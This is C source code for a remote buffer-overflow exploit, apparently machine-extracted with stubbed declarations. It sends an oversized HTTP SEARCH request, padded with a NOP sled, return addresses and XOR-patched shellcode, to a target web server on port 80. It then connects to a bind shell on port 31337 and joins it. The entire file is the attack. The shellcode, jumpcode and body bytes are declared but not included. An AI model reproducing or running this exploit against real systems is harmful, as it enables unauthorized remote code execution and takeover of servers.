
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {void* sin_port; void* sin_family; int sin_addr; } ;
struct sockaddr {int dummy; } ;
struct hostent {int h_length; int h_addr; } ;
typedef int sock2 ;
typedef int sock1 ;


 void* AF_INET ;
 int GETPROCADDRESS ;
 size_t GETPROC_OFFSET ;
 int LOADLIBRARYA ;
 size_t LOADL_OFFSET ;
 int NOP ;
 size_t PORT_OFFSET ;
 unsigned long RET ;
 int SOCK_STREAM ;
 int bcopy (int ,int *,int ) ;
 char* body ;
 int bzero (char*,int) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fprintf (int ,char*) ;
 struct hostent* gethostbyname (char*) ;
 void* htons (int) ;
 char* jumpcode ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int send (int,char*,int,int ) ;
 int shell (int) ;
 char* shellcode ;
 int sleep (int) ;
 int socket (void*,int ,int ) ;
 int sprintf (char*,char*,char*,int) ;
 int stderr ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int usage (char*) ;

int main(int argc, char **argv)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;

   if (argc != 2) usage(argv[0]);

   printf("Resolving %s .. ", argv[1]);
   if ((he = gethostbyname(argv[1])) == ((void*)0))
   {
      fprintf(stderr, "Unknown host\n");
      exit(-1);
   }

   printf("Resolved\n");

   port = htons(31337);
   port ^= 0x9999;

   *(unsigned short *)&shellcode[PORT_OFFSET] = port;
   *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
   *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;

   bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
   sock1.sin_family = AF_INET;
   sock1.sin_port = htons(80);

   printf("[+] Attacking to %s via port: 80\n", argv[1]);

   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("Failed to create socket");
      exit(-1);
   }

   if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
   {
      perror("Failed to connect");
      exit(-1);
   }

   bzero(buffer,100000);
   strcpy(buffer,"SEARCH /");

   i = strlen(buffer);
   buffer[i] = NOP;

   for (j=i+1; j < i+2150; j+=2)
       *(unsigned short *)&buffer[j] = (unsigned short)ret;

   for (; j < i+65535-strlen(jumpcode); j++)
       buffer[j] = NOP;

   memcpy(&buffer[j], jumpcode, strlen(jumpcode));
   strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
   sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
                                  "Content-Length: %d\r\n\r\n", argv[1], strlen(body)
+ strlen(shellcode));
   strcpy(buffer+strlen(buffer), body);
   memset(buffer+strlen(buffer), 0x01, 1);
   memset(buffer+strlen(buffer), NOP, 3);
   strcpy(buffer+strlen(buffer), shellcode);

   if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
   {
      perror("Failed to send");
      exit(-1);
   }

   printf("[+] Overflow sent, waiting for 5 seconds\n");
   sleep(5);

   bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
   sock2.sin_family = AF_INET;
   sock2.sin_port = htons(31337);

   printf("[+] Connecting to %s: 31337\n", argv[1]);

   if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("Failed to create socket");
      exit(-1);
   }

   if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
   {
      printf("[+] Unable to connect.\n"
             "[+] Exploitation failed, maybe blocked by firewall.\n");
      close(sock);
      close(sck);
      exit(-1);
   }

   close(sock);
   printf("[+] Successfull, attempting to join shell ...\n\n");
   shell(sck);
   return 0;
}
